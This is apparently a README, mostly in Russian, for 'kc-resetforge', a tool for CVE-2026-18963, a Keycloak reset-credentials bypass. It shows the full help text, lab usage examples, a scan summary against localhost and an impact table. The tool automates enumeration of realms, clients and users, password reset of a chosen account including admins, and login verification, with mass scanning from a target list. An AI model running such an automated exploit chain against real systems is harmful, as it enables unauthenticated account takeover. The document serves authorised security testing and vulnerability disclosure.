
Инструмент для обнаружения и проверки CVE-2026-18963 — обхода состояния reset-credentials в Keycloak. Выполняет определение версии, перечисление realm/client/user и проверяет, применяется ли предусловие action-token, для авторизованных оценок безопасности.
https://github.com/user-attachments/assets/005fab89-339a-4e4e-881c-da6a626f6c9e
python3 kc-resetforge.py -h
usage: kc-resetforge.py [-h] [--target TARGET] [--targets-file TARGETS_FILE] [--port PORT] [--realm REALM]
[--client-id CLIENT_ID] [--username USERNAME] [--new-password NEW_PASSWORD] [--skip-enum]
[--enum-only] [--kc-version] [--kc-reset-link] [--corpus-dir CORPUS_DIR] [--label LABEL]
[--enum-realms] [--no-enum-realms] [--enum-clients] [--no-enum-clients] [--enum-users]
[--no-enum-users] [--realm-wordlist REALM_WORDLIST] [--client-wordlist CLIENT_WORDLIST]
[--user-wordlist USER_WORDLIST] [--enum-users-client-id ENUM_USERS_CLIENT_ID]
[--verify-login] [--no-verify-login] [--verify-client-id VERIFY_CLIENT_ID]
[--timeout TIMEOUT] [--request-delay REQUEST_DELAY] [--output-dir OUTPUT_DIR]
[--proxy PROXY] [-d] [-y] [--json-out JSON_OUT]
CVE-2026-18963 Keycloak recon + exploit framework (own infra only)
options:
-h, --help show this help message and exit
--target TARGET Single target: bare host/IP, host:port, or a full http(s)://host[:port] URL. Scheme and port
are auto-detected if omitted (tries https then http; defaults to 443/80 respectively).
Mutually exclusive with --targets-file.
--targets-file TARGETS_FILE
Path to a file with one target per line, same flexible formats as --target ('#' comments
allowed). Runs recon+exploit against every target in turn.
--port PORT Override port for --target (or a fallback for --targets-file lines without their own port).
Per-line ports in --targets-file always take precedence.
--realm REALM Realm to target. If omitted, auto-selected from recon results.
--client-id CLIENT_ID
OIDC client_id to use. If omitted, auto-selected from recon results.
--username USERNAME Username to target. If omitted, auto-selected from recon results.
--new-password NEW_PASSWORD
Password to set for the target user (default: 'Test123!')
--skip-enum Skip recon entirely; --realm/--client-id/--username become required.
--enum-only Run recon and print results, but do not attempt exploitation.
--kc-version Only run the Keycloak version recon phase (fingerprint + corpus match + patch status) and
exit - skips realm/client/user enumeration and exploitation entirely. Works with both
--target and --targets-file.
--kc-reset-link Only check whether the self-service password-reset ('Forgot Password?' /
resetPasswordAllowed) flow is exposed, then exit - a single non-destructive GET, no username
needed. Auto-discovers realm/client via a light realm+client recon unless --realm/--client-
id are given explicitly. Skips exploitation. Works with both --target and --targets-file.
--corpus-dir CORPUS_DIR
Directory of known-version fingerprints for exact version matching (default:
kc_version_corpus).
--label LABEL Save THIS target's fingerprint into the corpus under this version label instead of matching
an unknown version. Use on an instance of known version.
--enum-realms Enumerate realm names (default: on during recon).
--no-enum-realms
--enum-clients Enumerate client IDs per realm (default: on during recon).
--no-enum-clients
--enum-users Enumerate usernames per realm (default: on during recon).
--no-enum-users
--realm-wordlist REALM_WORDLIST
--client-wordlist CLIENT_WORDLIST
--user-wordlist USER_WORDLIST
--enum-users-client-id ENUM_USERS_CLIENT_ID
Client used for the username-enumeration direct-grant probe (default: admin-cli).
--verify-login After a password change, confirm the new credentials via a password-grant token request
(default: on).
--no-verify-login
--verify-client-id VERIFY_CLIENT_ID
Client used for the verification password grant.
--timeout TIMEOUT
--request-delay REQUEST_DELAY
Seconds to wait before each request in the exploit chain (default: 0.4). Keycloak's login-
flow state can be timing-sensitive across the reset/restart/selector replay steps; a small
delay makes the chain more reliable. 0 to disable.
--output-dir OUTPUT_DIR
--proxy PROXY Route through an HTTP(S) proxy: 'burp' (127.0.0.1:8080 shorthand), a bare host:port, or a
full http(s):// URL.
-d, --debug Verbose debug logging of requests/responses/enum probes
-y, --yes Skip the 'Continue with this target?' prompt. Required for non-interactive use (scripts,
--targets-file with multiple targets, CI).
--json-out JSON_OUT Write a JSON report of recon + exploit results to this path.
kc-resetforge — CVE-2026-18963 Keycloak recon + exploit tool (own infra only)
Usage
-----
Fully automatic (recon -> auto-pick target -> exploit -> verify):
python3 kc-resetforge.py --target https://localhost:9990 --proxy burp -d
Recon only:
python3 kc-resetforge.py --target https://localhost:9990 --enum-only -d
Version + patch-status check only, across many hosts:
python3 kc-resetforge.py --targets-file targets.txt --kc-version
Skip recon, target directly:
python3 kc-resetforge.py --target https://localhost:9990 --realm master \
--client-id account --username admin --skip-enum
Requires: requests, beautifulsoup4, and optionally rich (pip install --break-system-packages)
26.7.226.4.15-1 / images 26.4-2326.6.6-1 / images 26.6-12kc-resetforge — это инструмент обнаружения/проверки. Он подтверждает, обеспечивает ли поток reset-credentials на целевом сервере корректное соблюдение предварительного условия action-token (исправлено) или нет (уязвимо), для использования в авторизованных оценках безопасности. Статья по ссылке ниже описывает механизм и методологию воспроизведения на глубине, соответствующей публичному раскрытию.
Полный анализ: Forging kc-resetforge: Turning CVE-2026-18963 Into a Repeatable Check
kc-resetforge.py не может спросить Keycloak «какая у вас версия?» — не существует предварительно аутентифицированной конечной точки, которая отвечает на этот вопрос. Вместо этого он снимает отпечаток цели (поля ответов, хэши статических ресурсов, favicon) и сравнивает его с корпусом отпечатков, которые вы уже пометили известной версией. Нет записи в корпусе для этого отпечатка = нет точной версии. Это сделано намеренно, а не является ошибкой.
Создайте корпус один раз для каждой версии, к которой у вас есть доступ:
python3 kc-resetforge.py --target https://known-26.6.2-host --kc-version --label 26.6.2
python3 kc-resetforge.py --target https://known-26.7.2-host --kc-version --label 26.7.2
[snip]
My Lab:
python3 kc-resetforge.py --target https://localhost:9990 --kc-version --label 26.6.2
python3 kc-resetforge.py --target https://localhost:9991 --kc-version --label 26.6.3
python3 kc-resetforge.py --target https://localhost:9992 --kc-version --label 26.6.4
python3 kc-resetforge.py --target https://localhost:9993 --kc-version --label 26.7.0
python3 kc-resetforge.py --target https://localhost:9994 --kc-version --label 26.7.1
python3 kc-resetforge.py --target https://localhost:9995 --kc-version --label 26.7.2
Recon:
python3 kc-resetforge.py --targets-file targets.txt --kc-version --kc-reset-link --proxy 127.0.0.1:8080
[snip]
[*] Proxying through: http://127.0.0.1:8080
[+] Run Summary
Targets scanned
┏━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━┓
┃Target ┃ Keycloak Version ┃ Patch ┃ Reset Link ┃ Result ┃
┡━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━┩
│https://localhost:9990 │ 26.6.2 │ VULNERABLE │ ENABLED │ checked│
│https://localhost:9991 │ 26.6.3 │ VULNERABLE │ ENABLED │ checked│
│https://localhost:9992 │ 26.6.4 │ VULNERABLE │ ENABLED │ checked│
│https://localhost:9993 │ 26.7.0 │ VULNERABLE │ ENABLED │ checked│
│https://localhost:9994 │ 26.7.1 │ VULNERABLE │ ENABLED │ checked│
│https://localhost:9995 │ 26.7.2 │ PATCHED │ ENABLED │ checked│
└───────────────────────┴──────────────────┴────────────┴────────────┴────────┘
Записи сохраняются рядом со скриптом, в kc_version_corpus/, поэтому они сохраняются независимо от того, из какого каталога вы запускаете инструмент. Не удаляйте эту папку.
Проверьте содержимое корпуса:
ls kc_version_corpus/
После маркировки каждое будущее сканирование автоматически сопоставляется с ним:
python3 kc-resetforge.py --target https://target --kc-version
python3 kc-resetforge.py --targets-file targets.txt --kc-version
Этот проект предоставляется строго для:
Не запускайте этот инструмент против любой системы, которой вы не владеете или на тестирование которой у вас нет явного письменного разрешения. Несанкционированное использование против сторонней инфраструктуры незаконно и выходит за рамки предполагаемого назначения этого проекта. Сопровождающий не несёт ответственности за неправомерное использование.
| Поле | Значение |
|---|
| CVE | CVE-2026-18963 |
| Критичность | Критическая |
| CVSS | 9.1 |
| CWE | CWE-640 (Слабый механизм восстановления пароля) |
| Компонент | Keycloak — поток аутентификации reset-credentials |
| Воздействие | Неаутентифицированный захват учётной записи без взаимодействия с пользователем (включая учётные записи администратора) |
| Исправленная версия | Keycloak 26.7.2 (upstream) / RHBK 26.4.15-1, 26.6.6-1 |